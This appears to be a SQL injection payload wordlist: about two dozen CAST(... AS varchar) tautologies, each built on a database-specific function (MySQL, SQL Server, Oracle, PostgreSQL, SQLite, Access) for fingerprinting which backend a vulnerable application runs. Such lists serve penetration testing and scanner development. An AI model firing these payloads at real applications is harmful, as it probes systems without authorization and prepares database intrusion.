CAST(conv('a',16,2)=conv('a',16,2) AS varchar)
CAST(connection_id()=connection_id() AS varchar)
CAST(crc32('MySQL')=crc32('MySQL') AS varchar)
CAST(BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123) AS varchar)
CAST(@@CONNECTIONS>0 AS varchar)
CAST(@@CONNECTIONS=@@CONNECTIONS AS varchar)
CAST(@@CPU_BUSY=@@CPU_BUSY AS varchar)
CAST(USER_ID(1)=USER_ID(1) AS varchar)
CAST(ROWNUM=ROWNUM AS varchar)
CAST(RAWTOHEX('AB')=RAWTOHEX('AB') AS varchar)
CAST(LNNVL(0=123) AS varchar)
CAST(5::int=5 AS varchar)
CAST(5::integer=5 AS varchar)
CAST(pg_client_encoding()=pg_client_encoding() AS varchar)
CAST(get_current_ts_config()=get_current_ts_config() AS varchar)
CAST(quote_literal(42.5)=quote_literal(42.5) AS varchar)
CAST(current_database()=current_database() AS varchar)
CAST(sqlite_version()=sqlite_version() AS varchar)
CAST(last_insert_rowid()>1 AS varchar)
CAST(last_insert_rowid()=last_insert_rowid() AS varchar)
CAST(val(cvar(1))=1 AS varchar)
CAST(IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 AS varchar)
CAST(cdbl(1)=cdbl(1) AS varchar)
CAST(1337=1337 AS varchar)
CAST('i'='i' AS varchar)
